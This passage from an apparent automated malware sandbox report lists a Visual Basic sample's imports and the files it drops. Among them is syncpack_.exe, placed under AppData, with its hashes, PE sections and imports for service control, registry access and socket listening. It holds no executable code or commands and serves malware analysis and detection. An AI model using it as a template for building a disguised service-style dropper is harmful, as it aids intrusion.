__vbaRedim | 0x0 | 0x4010ac | 0xd878 | 0xd878 |
EVENT_SINK_Release | 0x0 | 0x4010b0 | 0xd87c | 0xd87c |
__vbaUI1I2 | 0x0 | 0x4010b4 | 0xd880 | 0xd880 |
_CIsqrt | 0x0 | 0x4010b8 | 0xd884 | 0xd884 |
EVENT_SINK_QueryInterface | 0x0 | 0x4010bc | 0xd888 | 0xd888 |
__vbaUI1I4 | 0x0 | 0x4010c0 | 0xd88c | 0xd88c |
__vbaExceptHandler | 0x0 | 0x4010c4 | 0xd890 | 0xd890 |
_adj_fprem | 0x0 | 0x4010c8 | 0xd894 | 0xd894 |
_adj_fdivr_m64 | 0x0 | 0x4010cc | 0xd898 | 0xd898 |
(by ordinal) | 0x260 | 0x4010d0 | 0xd89c | 0xd89c |
__vbaFPException | 0x0 | 0x4010d4 | 0xd8a0 | 0xd8a0 |
__vbaInStrVar | 0x0 | 0x4010d8 | 0xd8a4 | 0xd8a4 |
(by ordinal) | 0x2cd | 0x4010dc | 0xd8a8 | 0xd8a8 |
__vbaStrVarVal | 0x0 | 0x4010e0 | 0xd8ac | 0xd8ac |
__vbaUbound | 0x0 | 0x4010e4 | 0xd8b0 | 0xd8b0 |
__vbaVarCat | 0x0 | 0x4010e8 | 0xd8b4 | 0xd8b4 |
(by ordinal) | 0x217 | 0x4010ec | 0xd8b8 | 0xd8b8 |
__vbaI2Var | 0x0 | 0x4010f0 | 0xd8bc | 0xd8bc |
(by ordinal) | 0x219 | 0x4010f4 | 0xd8c0 | 0xd8c0 |
_CIlog | 0x0 | 0x4010f8 | 0xd8c4 | 0xd8c4 |
__vbaErrorOverflow | 0x0 | 0x4010fc | 0xd8c8 | 0xd8c8 |
__vbaVar2Vec | 0x0 | 0x401100 | 0xd8cc | 0xd8cc |
__vbaNew2 | 0x0 | 0x401104 | 0xd8d0 | 0xd8d0 |
_adj_fdiv_m32i | 0x0 | 0x401108 | 0xd8d4 | 0xd8d4 |
_adj_fdivr_m32i | 0x0 | 0x40110c | 0xd8d8 | 0xd8d8 |
__vbaStrCopy | 0x0 | 0x401110 | 0xd8dc | 0xd8dc |
__vbaI4Str | 0x0 | 0x401114 | 0xd8e0 | 0xd8e0 |
__vbaFreeStrList | 0x0 | 0x401118 | 0xd8e4 | 0xd8e4 |
_adj_fdivr_m32 | 0x0 | 0x40111c | 0xd8e8 | 0xd8e8 |
__vbaPowerR8 | 0x0 | 0x401120 | 0xd8ec | 0xd8ec |
_adj_fdiv_r | 0x0 | 0x401124 | 0xd8f0 | 0xd8f0 |
(by ordinal) | 0x2ad | 0x401128 | 0xd8f4 | 0xd8f4 |
(by ordinal) | 0x64 | 0x40112c | 0xd8f8 | 0xd8f8 |
__vbaI4Var | 0x0 | 0x401130 | 0xd8fc | 0xd8fc |
__vbaVarAdd | 0x0 | 0x401134 | 0xd900 | 0xd900 |
__vbaAryLock | 0x0 | 0x401138 | 0xd904 | 0xd904 |
__vbaVarDup | 0x0 | 0x40113c | 0xd908 | 0xd908 |
__vbaFpI2 | 0x0 | 0x401140 | 0xd90c | 0xd90c |
__vbaFpI4 | 0x0 | 0x401144 | 0xd910 | 0xd910 |
_CIatan | 0x0 | 0x401148 | 0xd914 | 0xd914 |
__vbaStrMove | 0x0 | 0x40114c | 0xd918 | 0xd918 |
__vbaUI1Str | 0x0 | 0x401150 | 0xd91c | 0xd91c |
__vbaAryCopy | 0x0 | 0x401154 | 0xd920 | 0xd920 |
__vbaR8IntI4 | 0x0 | 0x401158 | 0xd924 | 0xd924 |
_allmul | 0x0 | 0x40115c | 0xd928 | 0xd928 |
_CItan | 0x0 | 0x401160 | 0xd92c | 0xd92c |
__vbaAryUnlock | 0x0 | 0x401164 | 0xd930 | 0xd930 |
__vbaFPInt | 0x0 | 0x401168 | 0xd934 | 0xd934 |
__vbaVarForNext | 0x0 | 0x40116c | 0xd938 | 0xd938 |
_CIexp | 0x0 | 0x401170 | 0xd93c | 0xd93c |
__vbaFreeStr | 0x0 | 0x401174 | 0xd940 | 0xd940 |
__vbaFreeObj | 0x0 | 0x401178 | 0xd944 | 0xd944 |
Exports (1)
Api name | EAT Address | Ordinal |
---|---|---|
cmdInsertSort_Click | 0x40c720 | 0x1 |
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp

Property | Value |
---|---|
Name | c:\users\kft6utqw\appdata\local\temp\d3d3.tmp (Created File) |
Size | 0.05 KB |
MD5 | f82e7a2f3860bbe2226620e0a569d5bb |
SHA1 | 4e7c4099d0597bc28f4ffea6a00d6c44341ee04c |
SHA256 | b1d64604932a6676690fda7132f96766bd05ed9118247d8ab4c642e9ddbf95f2 |
Actions | ... |
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe

Property | Value |
---|---|
Name | c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe (Created File) |
Size | 77.50 KB |
MD5 | 3290d6946b5e30e70414990574883ddb |
SHA1 | be0144e3235ffde0787e9f1cd34c828ec87d8e19 |
SHA256 | 0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663 |
Actions | ... |

PE Information
Information | Value |
---|---|
Image Base | 0x100000000 |
Entry Point | 0x10000bdfc |
Size Of Code | 0xf800 |
Size Of Initialized Data | 0x4400 |
Size Of Uninitialized Data | 0x0 |
Format | x64 |
Type | Executable |
Subsystem | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Machine Type | IMAGE_FILE_MACHINE_AMD64 |
Compile Timestamp | 2009-07-14 02:08:46 |
Compiler/Packer | Unknown |
Sections (5)
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x100001000 | 0xf7fe | 0xf800 | 0x400 | CNT_CODE, MEM_EXECUTE, MEM_READ | 5.98 |
.data | 0x100011000 | 0xe18 | 0x600 | 0xfc00 | CNT_INITIALIZED_DATA, MEM_READ, MEM_WRITE | 2.36 |
.pdata | 0x100012000 | 0xfa8 | 0x1000 | 0x10200 | CNT_INITIALIZED_DATA, MEM_READ | 4.58 |
.rsrc | 0x100013000 | 0x1fc8 | 0x2000 | 0x11200 | CNT_INITIALIZED_DATA, MEM_READ | 5.5 |
.reloc | 0x100015000 | 0x28a | 0x400 | 0x13200 | CNT_INITIALIZED_DATA, MEM_DISCARDABLE, MEM_READ | 2.9 |
Imports (117)
ADVAPI32.dll (9)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
SetServiceStatus | 0x0 | 0x100001000 | 0xfcf8 | 0xf0f8 |
RegisterServiceCtrlHandlerW | 0x0 | 0x100001008 | 0xfd00 | 0xf100 |
RegNotifyChangeKeyValue | 0x0 | 0x100001010 | 0xfd08 | 0xf108 |
RegCloseKey | 0x0 | 0x100001018 | 0xfd10 | 0xf110 |
RegOpenKeyExW | 0x0 | 0x100001020 | 0xfd18 | 0xf118 |
StartServiceCtrlDispatcherW | 0x0 | 0x100001028 | 0xfd20 | 0xf120 |
RegQueryValueExW | 0x0 | 0x100001030 | 0xfd28 | 0xf128 |
RegEnumKeyExW | 0x0 | 0x100001038 | 0xfd30 | 0xf130 |
SystemFunction036 | 0x0 | 0x100001040 | 0xfd38 | 0xf138 |
KERNEL32.dll (36)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
CreateEventW | 0x0 | 0x100001088 | 0xfd80 | 0xf180 |
WaitForMultipleObjects | 0x0 | 0x100001090 | 0xfd88 | 0xf188 |
Sleep | 0x0 | 0x100001098 | 0xfd90 | 0xf190 |
HeapSetInformation | 0x0 | 0x1000010a0 | 0xfd98 | 0xf198 |
WaitForSingleObject | 0x0 | 0x1000010a8 | 0xfda0 | 0xf1a0 |
SetEvent | 0x0 | 0x1000010b0 | 0xfda8 | 0xf1a8 |
CreateThread | 0x0 | 0x1000010b8 | 0xfdb0 | 0xf1b0 |
CreateTimerQueueTimer | 0x0 | 0x1000010c0 | 0xfdb8 | 0xf1b8 |
DeleteTimerQueueTimer | 0x0 | 0x1000010c8 | 0xfdc0 | 0xf1c0 |
GetCurrentProcessId | 0x0 | 0x1000010d0 | 0xfdc8 | 0xf1c8 |
DuplicateHandle | 0x0 | 0x1000010d8 | 0xfdd0 | 0xf1d0 |
GetCurrentProcess | 0x0 | 0x1000010e0 | 0xfdd8 | 0xf1d8 |
RaiseException | 0x0 | 0x1000010e8 | 0xfde0 | 0xf1e0 |
EnterCriticalSection | 0x0 | 0x1000010f0 | 0xfde8 | 0xf1e8 |
LeaveCriticalSection | 0x0 | 0x1000010f8 | 0xfdf0 | 0xf1f0 |
WriteFile | 0x0 | 0x100001100 | 0xfdf8 | 0xf1f8 |
ReadFile | 0x0 | 0x100001108 | 0xfe00 | 0xf200 |
BindIoCompletionCallback | 0x0 | 0x100001110 | 0xfe08 | 0xf208 |
CloseHandle | 0x0 | 0x100001118 | 0xfe10 | 0xf210 |
GetProcessHeap | 0x0 | 0x100001120 | 0xfe18 | 0xf218 |
HeapAlloc | 0x0 | 0x100001128 | 0xfe20 | 0xf220 |
UnhandledExceptionFilter | 0x0 | 0x100001130 | 0xfe28 | 0xf228 |
TerminateProcess | 0x0 | 0x100001138 | 0xfe30 | 0xf230 |
GetSystemTimeAsFileTime | 0x0 | 0x100001140 | 0xfe38 | 0xf238 |
GetCurrentThreadId | 0x0 | 0x100001148 | 0xfe40 | 0xf240 |
GetTickCount | 0x0 | 0x100001150 | 0xfe48 | 0xf248 |
QueryPerformanceCounter | 0x0 | 0x100001158 | 0xfe50 | 0xf250 |
GetModuleHandleW | 0x0 | 0x100001160 | 0xfe58 | 0xf258 |
SetUnhandledExceptionFilter | 0x0 | 0x100001168 | 0xfe60 | 0xf260 |
GetStartupInfoW | 0x0 | 0x100001170 | 0xfe68 | 0xf268 |
InitializeCriticalSection | 0x0 | 0x100001178 | 0xfe70 | 0xf270 |
DeleteCriticalSection | 0x0 | 0x100001180 | 0xfe78 | 0xf278 |
DeleteTimerQueueEx | 0x0 | 0x100001188 | 0xfe80 | 0xf280 |
CreateTimerQueue | 0x0 | 0x100001190 | 0xfe88 | 0xf288 |
GetLastError | 0x0 | 0x100001198 | 0xfe90 | 0xf290 |
HeapFree | 0x0 | 0x1000011a0 | 0xfe98 | 0xf298 |
msvcrt.dll (38)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
_unlock | 0x0 | 0x100001260 | 0xff58 | 0xf358 |
_lock | 0x0 | 0x100001268 | 0xff60 | 0xf360 |
?terminate@@YAXXZ | 0x0 | 0x100001270 | 0xff68 | 0xf368 |
memset | 0x0 | 0x100001278 | 0xff70 | 0xf370 |
_onexit | 0x0 | 0x100001280 | 0xff78 | 0xf378 |
??1type_info@@UEAA@XZ | 0x0 | 0x100001288 | 0xff80 | 0xf380 |
__dllonexit | 0x0 | 0x100001290 | 0xff88 | 0xf388 |
__set_app_type | 0x0 | 0x100001298 | 0xff90 | 0xf390 |
_fmode | 0x0 | 0x1000012a0 | 0xff98 | 0xf398 |
__setusermatherr | 0x0 | 0x1000012a8 | 0xffa0 | 0xf3a0 |
_amsg_exit | 0x0 | 0x1000012b0 | 0xffa8 | 0xf3a8 |
_initterm | 0x0 | 0x1000012b8 | 0xffb0 | 0xf3b0 |
_wcmdln | 0x0 | 0x1000012c0 | 0xffb8 | 0xf3b8 |
exit | 0x0 | 0x1000012c8 | 0xffc0 | 0xf3c0 |
_cexit | 0x0 | 0x1000012d0 | 0xffc8 | 0xf3c8 |
_exit | 0x0 | 0x1000012d8 | 0xffd0 | 0xf3d0 |
_XcptFilter | 0x0 | 0x1000012e0 | 0xffd8 | 0xf3d8 |
__C_specific_handler | 0x0 | 0x1000012e8 | 0xffe0 | 0xf3e0 |
__wgetmainargs | 0x0 | 0x1000012f0 | 0xffe8 | 0xf3e8 |
__CxxFrameHandler3 | 0x0 | 0x1000012f8 | 0xfff0 | 0xf3f0 |
_callnewh | 0x0 | 0x100001300 | 0xfff8 | 0xf3f8 |
malloc | 0x0 | 0x100001308 | 0x10000 | 0xf400 |
_CxxThrowException | 0x0 | 0x100001310 | 0x10008 | 0xf408 |
??0exception@@QEAA@AEBQEBDH@Z | 0x0 | 0x100001318 | 0x10010 | 0xf410 |
memmove | 0x0 | 0x100001320 | 0x10018 | 0xf418 |
realloc | 0x0 | 0x100001328 | 0x10020 | 0xf420 |
??0exception@@QEAA@XZ | 0x0 | 0x100001330 | 0x10028 | 0xf428 |
memmove_s | 0x0 | 0x100001338 | 0x10030 | 0xf430 |
memcpy_s | 0x0 | 0x100001340 | 0x10038 | 0xf438 |
_wcsicmp | 0x0 | 0x100001348 | 0x10040 | 0xf440 |
free | 0x0 | 0x100001350 | 0x10048 | 0xf448 |
?what@exception@@UEBAPEBDXZ | 0x0 | 0x100001358 | 0x10050 | 0xf450 |
??0exception@@QEAA@AEBV0@@Z | 0x0 | 0x100001360 | 0x10058 | 0xf458 |
isdigit | 0x0 | 0x100001368 | 0x10060 | 0xf460 |
??1exception@@UEAA@XZ | 0x0 | 0x100001370 | 0x10068 | 0xf468 |
??0exception@@QEAA@AEBQEBD@Z | 0x0 | 0x100001378 | 0x10070 | 0xf470 |
_commode | 0x0 | 0x100001380 | 0x10078 | 0xf478 |
memcpy | 0x0 | 0x100001388 | 0x10080 | 0xf480 |
ATL.DLL (6)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
(by ordinal) | 0x11 | 0x100001050 | 0xfd48 | 0xf148 |
(by ordinal) | 0x10 | 0x100001058 | 0xfd50 | 0xf150 |
(by ordinal) | 0x20 | 0x100001060 | 0xfd58 | 0xf158 |
(by ordinal) | 0x17 | 0x100001068 | 0xfd60 | 0xf160 |
(by ordinal) | 0x14 | 0x100001070 | 0xfd68 | 0xf168 |
(by ordinal) | 0x15 | 0x100001078 | 0xfd70 | 0xf170 |
WS2_32.dll (15)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
htons | 0x9 | 0x1000011c8 | 0xfec0 | 0xf2c0 |
getpeername | 0x5 | 0x1000011d0 | 0xfec8 | 0xf2c8 |
getsockname | 0x6 | 0x1000011d8 | 0xfed0 | 0xf2d0 |
bind | 0x2 | 0x1000011e0 | 0xfed8 | 0xf2d8 |
WSASocketW | 0x0 | 0x1000011e8 | 0xfee0 | 0xf2e0 |
socket | 0x17 | 0x1000011f0 | 0xfee8 | 0xf2e8 |
closesocket | 0x3 | 0x1000011f8 | 0xfef0 | 0xf2f0 |
ntohs | 0xf | 0x100001200 | 0xfef8 | 0xf2f8 |
WSAIoctl | 0x0 | 0x100001208 | 0xff00 | 0xf300 |
listen | 0xd | 0x100001210 | 0xff08 | 0xf308 |
htonl | 0x8 | 0x100001218 | 0xff10 | 0xf310 |
setsockopt | 0x15 | 0x100001220 | 0xff18 | 0xf318 |
WSAStartup | 0x73 | 0x100001228 | 0xff20 | 0xf320 |
WSACleanup | 0x74 | 0x100001230 | 0xff28 | 0xf328 |
WSAGetLastError | 0x6f | 0x100001238 | 0xff30 | 0xf330 |
ole32.dll (6)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
CoTaskMemFree | 0x0 | 0x1000013b8 | 0x100b0 | 0xf4b0 |
CoTaskMemAlloc | 0x0 | 0x1000013c0 | 0x100b8 | 0xf4b8 |
CoUninitialize | 0x0 | 0x1000013c8 | 0x100c0 | 0xf4c0 |
CoInitializeEx | 0x0 | 0x1000013d0 | 0x100c8 | 0xf4c8 |
CLSIDFromString | 0x0 | 0x1000013d8 | 0x100d0 | 0xf4d0 |
CoCreateInstance | 0x0 | 0x1000013e0 | 0x100d8 | 0xf4d8 |
OLEAUT32.dll (2)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
SysAllocString | 0x2 | 0x1000011b0 | 0xfea8 | 0xf2a8 |
SysFreeString | 0x6 | 0x1000011b8 | 0xfeb0 | 0xf2b0 |
ntdll.dll (3)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
RtlCaptureContext | 0x0 | 0x100001398 | 0x10090 | 0xf490 |
RtlLookupFunctionEntry | 0x0 | 0x1000013a0 | 0x10098 | 0xf498 |
RtlVirtualUnwind | 0x0 | 0x1000013a8 | 0x100a0 | 0xf4a0 |
WSOCK32.dll (2)
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset |
---|---|---|---|---|
ord1141 | 0x475 | 0x100001248 | 0xff40 | 0xf340 |
ord1142 | 0x476 | 0x100001250 | 0xff48 | 0xf348 |
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp

Property | Value |
---|---|
Name | c:\users\kft6utqw\appdata\local\temp\d3a3.tmp (Created File) |
Size | 0.09 KB |
MD5 | 373017c133fb80b96aaec222ce291d38 |
SHA1 | 08db0aebdfd799ce29aa3086abfac8dfccc6816e |
SHA256 | 5571ede5f2c75cadcf4f20a7388db611cff807b47b7a564f853f2cac8af2eb04 |
Actions | ... |
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp

Property | Value |
---|---|
Name | c:\users\kft6utqw\appdata\local\temp\d3d4.tmp (Created File) |
Size | 0.11 KB |
MD5 | 36427ecb2a0faf13af3047c51b29f9c5 |
SHA1 | 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f |
SHA256 | ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 |
Actions | ... |
c:\users\kft6utqw\appdata\local\temp\~df91d880e8a18f5eb9.tmp, ...

Property | Value |
---|---|
Name | c:\users\kft6utqw\appdata\local\temp\~df91d880e8a18f5eb9.tmp (Created File) |
Name | c:\users\kft6utqw\appdata\local\temp\~df0894a2d8a2a8bfc2.tmp (Created File) |
Size | 16.00 KB |
MD5 | ce338fe6899778aacfc28414f2d9498b |
SHA1 | 897256b6709e1a4da9daba92b6bde39ccfccd8c1 |
SHA256 | 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe |
Actions | ... |